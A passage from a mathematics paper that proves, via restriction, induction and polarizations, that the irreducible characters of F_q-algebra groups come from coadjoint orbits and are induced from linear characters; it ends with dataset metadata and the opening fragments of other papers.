\phi_{\alpha}.$$ Finally, we note that, by \refp{dec}, for each $\alp
\in \mathbb{F}_{q}$, the $H$-orbit $\calO_{\alp}$ considered above may be chosen to
be $x_{\alp} \cdot \calO_{0}$. Now, let $\alp \in \mathbb{F}_{q}$ and $a \in U$ be
arbitrary. Then, $$\phi_{\alp}(1+a) = \frac{1}{\sqrt{\ord{\calO_{\alp}}}}
\sum_{g \in \calO_{\alp}} \psi_{g}(a) = \frac{1}{\sqrt{\ord{\calO_{0}}}}
\sum_{f \in \calO_{0}} \psi_{x_{\alp} \cdot f}(a).$$ Let $f \in \calO_{0}$
be arbitrary. Then, by definition, $$\psi_{x_{\alp} \cdot f}(a) =
\psi((x_{\alp} \cdot f)(a)) = \psi(f(x_{\alp}^{-1} a x_{\alp}) =
\psi_{f}(x_{\alp}^{-1} a x_{\alp}).$$ This concludes the proof of the
following.
\prop{rest}
Let $H$ be a maximal algebra subgroup of $G$, let $U \subseteq J$ be such
that $H = 1+U$ and let $\apl{\pi}{J^{*}}{U^{*}}$ be the natural
projection. Let $\calO \in \bfOme(G)$ be arbitrary and let $\phi$
denote the class function $\phi_{\calO} \in \operatorname{cf}(G)$. Then, the
following statements hold:
\begin{enumerate}
\al{a} If $\calO$ is of type I (with respect to $H$), then the
restriction $\phi_{H}$ of $\phi$ to $H$ is the class function
$\phi_{0} = \phi_{\calO_{0}} \in \operatorname{cf}(H)$ corresponding to the
$H$-orbit $\calO_{0} = \pi(\calO) \subseteq U^{*}$.
\al{b} Suppose that $\calO$ is of type II (with respect to $H$).
Let $\left\{ x_{\alp} \colon \alp \in \mathbb{F}_{q} \right\}$ be a set of
representatives of the cosets of $H$ in $G$, let $\calO_{0} \in
\bfOme(H)$ be an (arbitrary) $H$-orbit satisfying $\calO_{0} \subseteq
\pi(\calO)$ and, for each $\alp \in \mathbb{F}_{q}$, let $\calO_{\alp} \in
\bfOme(H)$ be the $H$-orbit $\calO_{\alp} = x_{\alp} \cdot \calO_{0}$.
Then, the restriction $\phi_{H}$ of $\phi$ to $H$ is the sum
$$\phi_{H} = \sum_{\alp \in \mathbb{F}_{q}} \phi_{\alp}$$ of the (linearly
independent) class functions $\phi_{\alp} \in \operatorname{cf}(H)$, $\alp
\in \mathbb{F}_{q}$, which correspond to the $H$-orbits $\calO_{\alp}$,
$\alp \in \mathbb{F}_{q}$. Moreover, for each $\alp \in \mathbb{F}_{q}$, $\phi_{\alp}$ is
the class function defined by $\phi_{\alp}(x) = \phi_{0}(x_{\alp}^{-1}
x x_{\alp})$ for all $x \in H$.
\end{enumerate}
\end{propos}
In the next result, we use Frobenius reciprocity to obtain the
decomposition of the class function ${\phi_{\calO_{0}}}^{G} \in \operatorname{cf}(G)$
induced from the class function $\phi_{\calO_{0}} \in \operatorname{cf}(H)$ which
each associated with an arbitrary $H$-orbit $\calO_{0} \in \bfOme(H)$.
\prop{ind}
Let $H$ be a maximal algebra subgroup of $G$, let $U \subseteq J$ be such
that $H = 1+U$ and let $\apl{\pi}{J^{*}}{U^{*}}$ be the natural
projection. Let $\calO_{0} \in \bfOme(H)$ be arbitrary and let $\calO
\in \bfOme(G)$ be an arbitrary $G$-orbit satisfying $\calO_{0} \subseteq
\pi(\calO)$. Moreover, let $\phi_{0}$ denote the class function
$\phi_{\calO_{0}} \in \operatorname{cf}(H)$. Then, the following statements hold:
\begin{enumerate}
\al{a} Suppose that $\calO$ is of type I (with respect to $H$). Let
$e \in J$ be such that $J = U \+ \mathbb{F}_{q} e$ and let $e^{*} \in
U^{\perp}$ be such that $e^{*}(e) = 1$. Let $f \in \calO$ be
arbitrary and, for each $\alp \in \mathbb{F}_{q}$, let $\calO(\alp) \in \bfOme(G)$
denote the $G$-orbit which contains the element $f + \alp e^{*} \in
J^{*}$. Then, the $G$-orbits $\calO(\alp)$, for $\alp \in \mathbb{F}_{q}$,
are all distinct and the induced class function ${\phi_{0}}^{G}$ is
the sum $${\phi_{0}}^{G} = \sum_{\alp \in \mathbb{F}_{q}} \phi_{\calO(\alp)}$$ of
the (linearly independent) class functions $\phi_{\calO(\alp)}$, for
$\alp \in \mathbb{F}_{q}$.
\al{b} If $\calO$ is of type II (with respect to $H$), then
${\phi_{0}}^{G}$ is the class function $\phi = \phi_{\calO}$ which
corresponds to the $G$-orbit $\calO \in \bfOme(G)$.
\end{enumerate}
\end{propos}
\begin{proof}
By \refp{ortho}, we have $${\phi_{0}}^{G} = \sum_{\calO^{\prime} \in
\bfOme(G)} \mu_{\calO^{\prime}} \phi_{\calO^{\prime}}$$ where $\mu_{\calO^{\prime}} =
\left\langle {\phi_{0}}^{G}, \phi_{\calO^{\prime}} \right\rangle_{G}$ for all $\calO^{\prime} \in
\bfOme(G)$. Let $\calO^{\prime} \in \bfOme(G)$ be arbitrary. By Frobenius reciprocity,
we have $$\left\langle {\phi_{0}}^{G}, \phi_{\calO^{\prime}} \right\rangle_{G} = \left\langle \phi_{0},
(\phi_{\calO^{\prime}})_{H} \right\rangle_{H}.$$ Therefore, by \refp{rest},
$\mu_{\calO^{\prime}} \neq 0$ if and only if $\calO_{0} \subseteq \pi(\calO^{\prime})$;
moreover, if this is the case, we have $\mu_{\calO^{\prime}} = 1$. On the
other hand, let $f \in \calO$ be such that $\pi(f) \in \calO_{0}$; we
note that, in the case where $\calO$ is of type I (with respect to $H$),
we have $\pi(\calO) = \calO_{0}$ (by \refp{dec}) and so $\pi(f) \in
\calO_{0}$ for all $f \in \calO$. Let $\calO^{\prime} \in \bfOme(G)$ be such that
$\calO_{0} \subseteq \pi(\calO^{\prime})$. Then $\pi(f) = \pi(f^{\prime})$ for some $f^{\prime}
\in \calO^{\prime}$, hence $f^{\prime} \in \calL(f)$. Since $U^{\perp} = \mathbb{F}_{q}
e^{*}$, we have $\calL(f) = f + \mathbb{F}_{q} e^{*}$ and so there exists $\alp \in
\mathbb{F}_{q}$ such that $f^{\prime} = f + \alp e^{*}$. Therefore,
$\calO^{\prime}$ is the $G$-orbit which contains the element $f + \alp e^{*}$;
we denote this $G$-orbit by $\calO(\alp)$.
It follows that $${\phi_{0}}^{G} = \sum_{\alp \in \Gam}
\phi_{\calO(\alp)}$$ where $\Gam \subseteq \mathbb{F}_{q}$ is such that the $G$-orbits
$\calO(\alp)$, for $\alp \in \Gam$, are all distinct.
Suppose that $\calO$ is of type II. Then $\calL(f) \subseteq \calO$ (by
\refp{types}) and so $\calO(\alp) = \calO$ for all $\alp \in \mathbb{F}_{q}$. It
follows that, in this case, $\ord{\Gam} = 1$ and so
$${\phi_{0}}^{G} = \phi$$ as required (in part (b)).
On the other hand, suppose that $\calO$ is of type I. Let $\alp \in
\mathbb{F}_{q}$ be arbitrary. Then, by \refp{types}, the $G$-orbit $\calO(\alp)$
is also of type I; otherwise, $\calL(f) = \calL(f + \alp e^{*}) \subseteq
\calO(\alp)$. Therefore, by \refp{char}, $\ord{\calO(\alp)} =
\ord{\calO_{0}}$ and so $$q \sqrt{\ord{\calO_{0}}} = {\phi_{0}}^{G}(1) =
\sum_{\alp \in \Gam} \phi_{\calO(\alp)}(1) = \sum_{\alp \in \Gam}
\sqrt{\ord{\calO(\alp)}} = \ord{\Gam} \sqrt{\ord{\calO_{0}}}.$$ It
follows that $\ord{\Gam} = q$ and so $\Gam = \mathbb{F}_{q}$. In particular, we
conclude that the $G$-orbits $\calO(\alpha)$, for $\alp \in \mathbb{F}_{q}$, are
all distinct. Moreover, we obtain $${\phi_{0}}^{G} = \sum_{\alp \in
\mathbb{F}_{q}} \phi_{\calO(\alp)}$$ as required (in part (a)).
The proof is complete.
\end{proof}
As a consequence (of the proof) we deduce the following result.
\prop{inv}
Let $H$ be a maximal algebra subgroup of $G$, let $U \subseteq J$ be such
that $H = 1+U$ and let $\apl{\pi}{J^{*}}{U^{*}}$ be the natural
projection. Let $\calO_{0} \in \bfOme(H)$ be arbitrary and let $\calO
\in \bfOme(G)$ be an arbitrary $G$-orbit satisfying $\calO_{0} \subseteq
\pi(\calO)$. Then, the following statements hold:
\begin{enumerate}
\al{a} Suppose that $\calO$ is of type I (with respect to $H$). Let
$e \in J$ be such that $J = U \+ \mathbb{F}_{q} e$ and let $e^{*} \in
U^{\perp}$ be such that $e^{*}(e) = 1$. Let $f \in \calO$ be
arbitrary and, for each $\alp \in \mathbb{F}_{q}$, let $\calO(\alp) \in \bfOme(G)$
denote the $G$-orbit which contains the element $f + \alp e^{*} \in
J^{*}$. Then, the $G$-orbits $\calO(\alp)$, for $\alp \in \mathbb{F}_{q}$,
are all distinct and the inverse image $\pi^{-1}(\calO_{0})$ decomposes
as the disjoint union $$\pi^{-1}(\calO_{0}) = \bigcup_{\alp \in \mathbb{F}_{q}}
\calO(\alp)$$ of the $G$-orbits $\calO(\alp) \in \bfOme(G)$, for $\alp
\in \mathbb{F}_{q}$.
\al{b} If $\calO$ is of type II (with respect to $H$), then
$\pi^{-1}(\calO_{0}) \subseteq \calO$. Moreover, this inclusion is proper.
\end{enumerate}
\end{propos}
\begin{proof}
Suppose that $\calO$ is of type I. Let $\alp \in \mathbb{F}_{q}$ be arbitrary.
Then, as we have seen in the proof of \refp{ind}, $\calO(\alp)$ is also
of type I and so $\pi(\calO(\alp)) = \calO_{0}$ (by \refp{dec} because
$\calO_{0} \subseteq \pi(\calO(\alp))$). It follows that $\calO(\alp) \subseteq
\pi^{-1}(\calO_{0})$. Conversely, suppose that $g \in J^{*}$ is such
that $\pi(g) \in \calO_{0}$. Since $\calO_{0} = \pi(\calO)$, there
exists $x \in G$ such that $\pi(g) = \pi(x \cdot f)$. It follows that
$g \in \calL(x \cdot f)$. Since $\calL(x \cdot f) = x \cdot
\calL(f)$ and since $\calL(f) = f + U^{\perp}$, we conclude that
$g = x \cdot \left( f + \alp e^{*} \right)$ (hence, $g \in \calO(\alp)$)
for some $\alp \in \mathbb{F}_{q}$. This completes the proof of part (a).
Now, suppose that $\calO$ is of type II. Let $g \in J^{*}$ be such
that $\pi(g) \in \calO_{0}$. Since $\calO_{0} \subseteq \pi(\calO)$, there
exists $f \in \calO$ such that $\pi(g) = \pi(f)$. Therefore, $g \in
\calL(f)$. Since $\calO$ is of type II, $\calL(f) \subseteq \calO$ (by
\refp{types}) and so $g \in \calO$. Since $g \in \pi^{-1}(\calO_{0})$ is
arbitrary, we conclude that $\pi^{-1}(\calO_{0}) \subseteq \calO$. To see
that this inclusion is proper, it is enough to choose $g \in \calO$
such that $\pi(g) \in x_{\alp} \cdot \calO_{0}$ for some $\alp \in
\mathbb{F}_{q}$, $\alp \neq 0$, where $\left\{ x_{\alp} \colon \alp \in \mathbb{F}_{q} \right\}$
is as in \refp{dec}.
\end{proof}
\sec{irred}{Irreducible characters}
The purpose of this section is the proof of the following result.
\th{irred}
Let $G$ be an arbitrary $\mathbb{F}_{q}$-algebra group. Then, for each $\calO
\in \bfOme(G)$, the class function $\phi_{\calO}$ is an irreducible
character of $G$. Moreover, we have $\irr(G) = \left\{ \phi_{\calO}
\colon \calO \in \bfOme(G) \right\}$.
\eth
By \refp{ortho}, it is enough to show that the class functions
$\phi_{\calO} \in \operatorname{cf}(G)$, $\calO \in \bfOme(G)$, are, in fact,
characters. And, to see this, we proceed by induction on $\ord{G}$ (the
result being clear if $\ord{G} = 1$). The key step is solved by the
following lemma. As before, $G = 1+J$ where $J = J(A)$ is the
Jacobson radical of a finite dimensional $\mathbb{F}_{q}$-algebra $A$.
\lem{irred}
Let $H$ be a maximal algebra subgroup of $G$, let $U \subseteq J$ be
such that $H = 1 + U$ and let $\pi \colon J^{*} \rightarrow U^{*}$ be
the natural projection. Let $\calO \in \bfOme(G)$ and let $\calO_{0} \in
\bfOme(H)$ be any $H$-orbit with $\calO_{0} \subseteq \pi(\calO)$. Assume
that the class function $\phi_{\calO_{0}} \in \operatorname{cf}(H)$ is a character
of $H$. Then, the class function $\phi_{\calO} \in \operatorname{cf}(G)$ is a
character of $G$.
\end{lemma}
The proof of \refl{irred} relies on the following result (and on its
corollary).
\lem{char}
Let $H$ be a maximal algebra subgroup of $G$, let $\chi \in \irr(G)$
and let $\tet \in \irr(H)$ be an irreducible constituent of $\chi_{H}$.
Then one (and only one) of the following two possibilities occurs:
\begin{enumerate}
\al{a} $\chi_{H} = \tet$ is an irreducible character of $H$ and
$\tet^{G}$ has $q$ distinct irreducible constituents each one
occurring with multiplicity one. The irreducible constituents of
$\tet^{G}$ are the characters $\lam \chi$ for $\lam \in \irr(G/H)$
(as usual, $\irr(G/H)$ is naturally identified with a subset of
$\irr(G)$).
\al{b} $\tet^{G} = \chi$ is an irreducible character of $G$ and
$\chi_{H}$ has $q$ distinct irreducible constituents each one
occurring with multiplicity one.
\end{enumerate}
\end{lemma}
\begin{proof}
By \cite[Corollary~11.29]{isaacs2}, we know that $\chi(1)/\tet(1)$
divides $\ord{G:H}$ (we recall that $H$ is a normal subgroup of
$G$). Since $G$ and $H$ are $\mathbb{F}_{q}$-algebra subgroups,
\cite[Theorem~A]{isaacs1} asserts that $\chi(1)$ and $\tet(1)$ are
powers of $q$. Moreover, being a maximal algebra subgroup of $G$, we
know that $H$ has index $q$ in $G$. It follows that, either
$\chi(1) = \tet(1)$, or $\chi(1) = q \tet(1)$.
Suppose that $\chi(1) = \tet(1)$. Then, we must have $\chi_{H} =
\tet$ and this is the situation of (a). The assertion concerning the
induced character is an easy application of a result of Gallagher (see
\cite[Corollary~6.17]{isaacs2}).
On the other hand, suppose that $\chi(1) = q \tet(1)$. Then $\chi =
\tet^{G}$ (because $\tet^{G}(1) = q \tet(1)$ and because, by
Frobenius reciprocity, $\chi$ is an irreducible constituent of
$\tet^{G}$). By Clifford's Theorem (see, for example,
\cite[Theorem~6.2]{isaacs2}), we have $$\chi_{H} = e \sum_{i=1}^{t}
\tet_{i}$$ where $\tet = \tet_{1}, \tet_{2}, \ldots, \tet_{t}$ are
all the distinct conjugates of $\tet$ in $G$ and where $e = \left\langle
\chi_{H}, \tet \right\rangle_{H}$. (The $G$-action on $\irr(H)$ is defined as
usual by $\tet^{x}(y) = \tet(x^{-1} y x)$ for all $\tet \in \irr(H)$,
all $x \in G$ and all $y \in H$.) By Frobenius reciprocity, we deduce
that $\left\langle \chi_{H}, \tet \right\rangle_{H} = \left\langle \chi, \tet^{G} \right\rangle_{G} =
1$ (because $\chi = \tet^{G}$). It follows that $\chi(1) =
\sum_{i=1}^{t} \tet_{i}(1) = t \tet(1)$ (because $\tet_{i}(1) =
\tet(1)$ for all $1 \leq i \leq t$) and so $t = q$.
The proof is complete.
\end{proof}
The following easy consequence will also be very useful.
\cor{frob}
Let $H$ be a maximal algebra subgroup of $G$ and let $\chi, \chi^{\prime} \in
\irr(G)$. Then, the following hold:
\begin{enumerate}
\al{a} If $\chi_{H}$ is irreducible, then $\left\langle \chi_{H}, \chi^{\prime}_{H}
\right\rangle_{H} \neq 0$ if and only if $\chi^{\prime} = \lam \chi$ for some $\lam
\in \irr(G/H)$.
\al{b} If $\chi_{H}$ is reducible, then $\left\langle \chi_{H}, \chi^{\prime}_{H}
\right\rangle_{H} \neq 0$ if and only if $\chi^{\prime} = \chi$. Moreover, we have
$\left\langle \chi_{H}, \chi_{H} \right\rangle_{H} = q$.
\end{enumerate}
\end{corol}
\begin{proof}
Suppose that $\chi_{H} = \tet \in \irr(H)$. By Frobenius reciprocity,
we have $\left\langle \tet, \chi^{\prime}_{H} \right\rangle_{H} = \left\langle \tet^{G}, \chi^{\prime}
\right\rangle_{G}$ and so $\left\langle \chi_{H}, \chi^{\prime}_{H} \right\rangle_{H} \neq 0$ if and only
if $\chi^{\prime} = \lam \chi$ for some $\lam \in \irr(G/H)$ (by part (a) of
\refl{char}).
On the other hand, suppose that $\chi_{H}$ is reducible and let
$\chi^{\prime} \in \irr(G)$ be such that $\left\langle \chi_{H}, \chi^{\prime}_{H} \right\rangle_{H}
\neq 0$. Then, there exists $\tet \in \irr(H)$ such that $\left\langle
\tet, \chi_{H} \right\rangle_{H} \neq 0$ and $\left\langle \tet, \chi^{\prime}_{H} \right\rangle_{H}
\neq 0$. By part (b) of \refl{char}, we have $\chi = \tet^{G}$ and
so, using Frobenius reciprocity, we deduce that $\left\langle \chi, \chi^{\prime}
\right\rangle_{G} = \left\langle \tet^{G}, \chi^{\prime} \right\rangle_{G} = \left\langle \tet, \chi^{\prime}_{H}
\right\rangle_{H} \neq 0$. Since $\chi, \chi^{\prime} \in \irr(G)$, we conclude
that $\chi = \chi^{\prime}$. Finally, by part (b) of \refl{char}, it is clear
that $\left\langle \chi_{H}, \chi_{H} \right\rangle_{H} = q$.
The proof is complete.
\end{proof}
We are now able to prove \refl{irred}.
\renewcommand{\proofname}{Proof of \refl{irred}}
\begin{proof}
For simplicity, we write $\phi = \phi_{\calO}$ and $\phi_{0} =
\phi_{\calO_{0}}$. If $\calO$ is of type II with respect to $H$, then
$\phi = (\phi_{0})^{G}$ (by \refp{ind}) and the result is clear. On
the other hand, suppose that $\calO$ is of type I with respect to $H$.
Then, by \refp{rest}, $\phi_{0} = \phi_{H}$ and $\left\langle {\phi_{0}}^{G},
{\phi_{0}}^{G} \right\rangle_{G} = q$. By \refp{ortho}, we have $$\phi =
\sum_{\chi \in \irr(G)} \mu_{\chi} \chi$$ where $\mu_{\chi} \in \CC$ for
all $\chi \in \irr(G)$. Let $\calI = \left\{ \chi \in \irr(G) \colon
\mu_{\chi} \neq 0 \right\}$ be the support of $\phi$. Since $\left\langle \phi, \phi
\right\rangle_{G} = 1$, we have
\eq{mu}
\sum_{\chi \in \calI} \ord{\mu_{\chi}}^{2} = 1.
\end{equation}
Now, we consider the restriction
\eq{rest}
\phi_{0} = \phi_{H} = \sum_{\chi \in \calI} \mu_{\chi} \chi_{H}
\end{equation}
of $\phi$ to $H$.
We claim that $\chi_{H} \in \irr(H)$ for all $\chi \in \calI$. To see
this, suppose that $\chi_{H}$ is reducible for some $\chi \in \calI$.
Let $\tet \in \irr(H)$ be an irreducible constituent of $\chi_{H}$. Then,
$\tet$ occurs in the sum of the right hand side of \refe{rest} with
coefficient $\mu_{\chi}$; in fact, $\left\langle \tet, \chi_{H} \right\rangle_{H} =
1$ (by \refl{char}) and $\left\langle \tet, \chi^{\prime}_{H} \right\rangle_{H} = 0$ for
all $\chi^{\prime} \in \irr(G)$ with $\chi^{\prime} \neq \chi$ (otherwise, $\left\langle
\chi_{H}, \chi^{\prime}_{H} \right\rangle_{H} \neq 0$ and this is in contradiction
with \refc{frob}). It follows that \refe{rest} has the form
\eq{rest2}
\phi_{0} = \mu_{\chi} \tet_{1} + \cdots + \mu_{\chi} \tet_{q} + \xi
\end{equation}
where $\tet_{1} = \tet, \tet_{2}, \ldots, \tet_{q}$ are the $q$ distinct
irreducible constituents of $\chi_{H}$ (see \refl{char}) and where $\xi
\in \operatorname{cf}(H)$ is a $\CC$-linear combination of $\irr(H) \setminus \left\{
\seq{\tet}{q} \right\}$. Now, since $\phi_{0}$ is a character of $H$ (by
assumption) and since $\left\langle \phi_{0}, \phi_{0} \right\rangle_{H} = 1$ (by
\refp{ortho}), we have $\phi_{0} \in \irr(H)$. Since $\irr(H)$ is a
$\CC$-basis of $\operatorname{cf}(H)$, the equality \refe{rest2} implies that
$\mu_{\chi} = 0$ and this is in contradiction with $\chi \in \calI$. This
completes the proof of our claim, i.e., $\chi_{H} \in \irr(H)$ for all
$\chi \in \calI$.
Now, for each $\tet \in \irr(H)$, let $\calI_{\tet} = \left\{ \chi \in
\calI \colon \chi_{H} = \tet \right\}$ and let $$\mu_{\tet} = \sum_{\chi \in
\calI_{\tet}} \mu_{\chi}.$$ Then $\calI$ is the disjoint union $$\calI =
\bigcup_{\tet \in \irr(H)} \calI_{\tet}$$ and so $$\phi_{0} = \sum_{\tet
\in \irr(H)} \mu_{\tet} \tet.$$ Since $\phi_{0} \in \irr(H)$, we conclude
that $\mu_{\tet} = \del_{\tet, \phi_{0}}$ for all $\tet \in \irr(H)$.
Hence, $$\sum_{\chi \in \calI} \mu_{\chi} = \sum_{\tet \in \irr(H)}
\mu_{\tet} = 1.$$ Using \refe{mu}, we easily deduce that there exists
a unique $\chi \in \irr(G)$ with $\mu_{\chi} \neq 0$ and, in fact,
$\mu_{\chi} = 1$.
The proof is complete.
\end{proof}
\renewcommand{\proofname}{Proof}
\sec{proof}{Proof of \reft{main}}
In this section, we prove \reft{main}. As before, let $A$ be a
finite dimensional $\mathbb{F}_{q}$-algebra, let $J = J(A)$ be the Jacobson radical
of $A$ and let $G = 1+J$ be the $\mathbb{F}_{q}$-algebra group defined by $J$.
We consider the chain $J \supseteq J^{2} \supseteq J^{3} \supseteq \ldots$ of ideals
of $A$. Since $J$ is nilpotent, there exists the smallest integer $m$ with
$J^{m} \neq \left\{ 0 \right\}$. Moreover, we may refine the chain $$J \supseteq
J^{2} \supseteq \ldots \supseteq J^{m} \supseteq \left\{ 0 \right\}$$ to obtain a (maximal)
chain $$\left\{ 0 \right\} = U_{0} \subseteq U_{1} \subseteq \ldots \subseteq U_{n} =
J$$ of ideals of $A$ satisfying $$\dim U_{i+1} = \dim U_{i}+1$$ for
all $0 \leq i < n$. Let $f \in J^{*}$ be arbitrary and, for each $0 \leq
i \leq n$, let $$R_{i} = \left\{ a \in U_{i} \colon f([ab]) = 0 \text{ for all } b \in
U_{i} \right\}.$$ Finally, let $$U = R_{1} + \cdots + R_{n}.$$
It is clear that $U$ is an $\mathbb{F}_{q}$-subspace of $J$. Now, let $a,b \in U$
and suppose that $a \in R_{i}$ and $b \in R_{j}$ for some $1 \leq i, j
\leq n$ with $i \leq j$. We claim that $ab \in R_{i}$. To see this, let
$c \in U_{i}$ be arbitrary. Then, $$f([ab,c]) = f([a,bc]) + f([b,ca]).$$
Since $U_{i}$ is an ideal of $A$, we have $bc \in U_{i}$, hence
$f([a,bc]) = 0$ (because $a \in R_{i}$). On the other hand, we have $ca
\in U_{i}$. Since $U_{i} \subseteq U_{j}$ (because $i \leq j$) and and
since $b \in R_{j}$, we conclude that $f([b,ca]) = 0$. Thus $$f([ab,c]) =
f([a,bc]) + f([b,ca]) = 0$$ and so $ab \in R_{i}$ (because $c \in U_{i}$
is arbitrary). It follows that $U$ is a multiplicatively closed
$\mathbb{F}_{q}$-subspace of $J$. Hence, $H = 1+U$ is an algebra subgroup of $G$.
Moreover, a similar argument shows that $$f([ab]) = 0$$ for all $a,b \in
U$. This means that $U$ is an {\it $f$-isotropic} $\mathbb{F}_{q}$-subspace of
$J$ (i.e., $U$ is isotropic with respect to the skew-symmetric bilinear form
$B_{f}$ which was defined in \refs{class}.) Next, we claim that $U$ is
a maximal $f$-isotropic $\mathbb{F}_{q}$-subspace of $J$. By Witt's Theorem (see,
for example, \cite[Theorems~3.10~and~3.11]{artin}), it is enough to
prove that
\eq{mdim}
\dim U = \frac{1}{2} \left( \dim J + \dim \operatorname{Rad}(f) \right).
\end{equation}
To see this, we proceed by induction on $\dim J$. If $\dim J = 1$, then
$U = J = \operatorname{Rad}(f)$ and the claim is trivial. Now, suppose that $\dim J >
1$ and consider the ideal $U_{n-1}$ of $J$. Let $$U^{\prime} = R_{1} + \cdots +
R_{n-1}.$$ By induction, we have $$\dim U^{\prime} = \frac{1}{2} \left( \dim
U_{n-1} + \dim \operatorname{Rad}(f^{\prime}) \right)$$ where $f^{\prime}$ is the restriction of $f$
to $U_{n-1}$. Using \refp{rad} and \refp{char}, we conclude that, either
$\dim \operatorname{Rad}(f) = \dim \operatorname{Rad}(f^{\prime}) - 1$, or $\dim \operatorname{Rad}(f) = \dim
\operatorname{Rad}(f^{\prime}) + 1$. In the first case, we deduce that $$\dim U^{\prime} =
\frac{1}{2} \left( \dim J - 1 + \dim \operatorname{Rad}(f) + 1 \right) = \frac{1}{2} \left(
\dim J + \dim \operatorname{Rad}(f) \right).$$ Therefore, $U^{\prime}$ is a maximal $f$-isotropic
$\mathbb{F}_{q}$-subspace of $J$. Since $U^{\prime} \subseteq U$, we conclude that $U^{\prime} = U$
and \refe{mdim} follows in this case. On the other hand, suppose that
$\dim \operatorname{Rad}(f) = \dim \operatorname{Rad}(f^{\prime}) + 1$. Then, $$\dim U^{\prime} = \frac{1}{2} \left(
\dim J - 1 + \dim \operatorname{Rad}(f) - 1 \right) = \frac{1}{2} \left( \dim J + \dim
\operatorname{Rad}(f) \right) - 1.$$ Since $U^{\prime} \subseteq U$, we have $\dim U^{\prime} \leq \dim
U$. If $\dim U^{\prime} = \dim U$, then $U^{\prime} = U$ and so $\operatorname{Rad}(f) \subseteq U^{\prime}
\subseteq U_{n-1}$. If this were the case, we should have $\operatorname{Rad}(f) \subseteq
\operatorname{Rad}(f^{\prime})$ and so $\dim \operatorname{Rad}(f) \leq \dim \operatorname{Rad}(f^{\prime})$, a
contradiction. It follows that $$\dim U^{\prime} < \dim U.$$ Since $U$ is an
$f$-isotropic $\mathbb{F}_{q}$-subspace of $J$, we deduce that $$\dim U^{\prime} \leq \dim
U - 1 \leq \frac{1}{2} \left( \dim J + \dim \operatorname{Rad}(f) \right) - 1 = \dim U^{\prime}.$$
The proof of \refe{mdim} is complete.
Given an arbitrary element $f \in J^{*}$, we will say that a multiplicatively
closed $\mathbb{F}_{q}$-subspace $U$ of $J$ is an {\bf $f$-polarization} if $U$ is
a maximal $f$-isotropic $\mathbb{F}_{q}$-subspace of $J$. Hence, we have finished
the proof of the following.
\prop{polar}
Let $f \in J^{*}$ be arbitrary. Then, there exists a $f$-polariza\-tion
$U \subseteq J$.
\end{propos}
Now, it is easy to conclude the proof of \reft{main}.
\renewcommand{\proofname}{Proof of \reft{main}}
\begin{proof}
Let $\chi$ be an (arbitrary) irreducible character of $G$. Then, by
\reft{irred}, $\chi = \phi_{\calO}$ for some $G$-orbit $\calO \in
\bfOme(G)$. Let $f \in \calO$ be arbitrary and let $U \subseteq J$ be an
$f$-polarization. Then, $H = 1+U$ is an algebra subgroup of $G$. Let
$f_{0} \in U^{*}$ be the restriction of $f$ to $U$. Since $U$ is
$f$-isotropic, we have $\operatorname{Rad}(f_{0}) = U$, hence $C_{H}(f_{0}) = H$ (by
\refp{rad}). It follows that $\calO_{0} = \left\{ f_{0} \right\}$ is a
single $H$-orbit on $U^{*}$ (i.e., an element of $\bfOme(H)$). We denote
by $\lam_{f}$ the class function $\phi_{\calO_{0}}$ of $H$; by
definition, $\lam_{f} \colon H \rightarrow \CC$ is defined by
$$\lam_{f}(1+a) = \psi_{f}(a) = \psi(f(a))$$ for all $a \in U$. By
\reft{irred}, we know that $\lam_{f}$ is an irreducible
character of $H$. Moreover, $\lam_{f}(1) = \sqrt{\ord{\calO_{0}}} = 1$,
i.e., $\lam_{f}$ is a linear character of $H$. To conclude the proof,
we claim that
\eq{induced}
\phi_{\calO} = {\lam_{f}}^{G}.
\end{equation}
To see this, we evaluate the Frobenius product $\left\langle \phi_{\calO},
{\lam_{f}}^{G} \right\rangle_{G}$. Using Frobenius reciprocity (and the
definition of $\phi_{\calO}$), we deduce that
\begin{eqnarray*}
\left\langle \phi_{\calO}, {\lam_{f}}^{G} \right\rangle_{G} & = & \left\langle
(\phi_{\calO})_{H}, \lam_{f} \right\rangle_{H} \\
& = & \frac{1}{\ord{H}} \sum_{x \in H} \phi_{\calO}(x)
\overline{\lam_{f}(x)} \\
& = & \frac{1}{\ord{U}} \sum_{a \in U} \left(
\frac{1}{\sqrt{\ord{\calO}}} \sum_{g \in \calO} \psi_{g}(a) \right)
\overline{\psi_{f}(a)} \\
& = & \frac{1}{\sqrt{\ord{\calO}}} \sum_{g \in \calO} \left(
\frac{1}{\ord{U}} \sum_{a \in U} \psi_{g}(a) \overline{\psi_{f}(a)} \right) \\
& = & \frac{1}{\sqrt{\ord{\calO}}} \left\langle \psi_{g}, \psi_{f} \right\rangle_{U^{+}}.
\end{eqnarray*}
By \refe{irrJ}, given any $g \in J^{*}$, we have $\left\langle \psi_{g},
\psi_{f} \right\rangle_{U^{+}} \neq 0$ if and only if $f(a) = g(a)$ for all $a \in
U$; in other words, $\left\langle \psi_{g}, \psi_{f} \right\rangle_{U^{+}} \neq 0$ if and
only if $g \in f+U^{\perp}$. Since $\psi_{g}$ is linear for all $g \in
J^{*}$, we conclude that
\eq{frobenius}
\left\langle \phi_{\calO}, {\lam_{f}}^{G} \right\rangle_{G} = \frac{\ord{(f+U^{\perp})
\cap \calO}}{\sqrt{\ord{\calO}}}.
\end{equation}
It follows that $\left\langle \phi_{\calO}, {\lam_{f}}^{G} \right\rangle_{G} \neq 0$
(because $f \in (f+U^{\perp}) \cap \calO$), hence $\phi_{\calO}$ is an
irreducible constituent of ${\lam_{f}}^{G}$. On the other hand, we
have $\phi_{\calO}(1) = \sqrt{\ord{\calO}}$ and
\begin{eqnarray*}
{\lam_{f}}^{G}(1) & = & \ord{G:H} \lam_{f}(1) = q^{\dim J - \dim U} \\
& = & \sqrt{q^{\dim J - \dim \operatorname{Rad}(f)}} = \sqrt{\ord{G:C_{G}(f)}} =
\sqrt{\ord{\calO}}
\end{eqnarray*}
(using \refe{mdim} and \refp{rad}). The claim \refe{induced} follows and
the proof of \reft{main} is complete.
\end{proof}
\renewcommand{\proofname}{Proof}
| 2024-02-18T23:40:12.261Z | 1998-11-23T17:40:00.000Z | algebraic_stack_train_0000 | 1,635 | 13,291 |
|
proofpile-arXiv_065-8054 | \section{#1}}
\renewcommand{\theequation}{\thesection.\arabic{equation}}
\renewcommand{\thefootnote}{\fnsymbol{footnote}}
\def | 2024-02-18T23:40:12.438Z | 1999-02-16T13:33:07.000Z | algebraic_stack_train_0000 | 1,646 | 13 |
|
proofpile-arXiv_065-8099 | \section{Introduction}
Imaging techniques are used in many diverse
areas such as geophysics, astronomy, medical diagnostics, and police
work. The goal of imaging varies widely from determining the density
